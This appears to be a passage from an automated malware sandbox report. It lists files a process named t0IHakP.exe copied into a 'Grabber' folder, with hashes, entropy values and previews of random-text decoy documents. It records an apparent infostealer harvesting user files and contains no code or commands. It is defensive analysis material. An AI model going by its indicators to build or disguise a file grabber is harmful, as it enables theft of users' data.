Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU\AFWAAFRXKO.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU\NHPKIZUUSG.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU\QVTVNIBKSD.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU\XQACHMZIHU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Documents\AFWAAFRXKO.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRM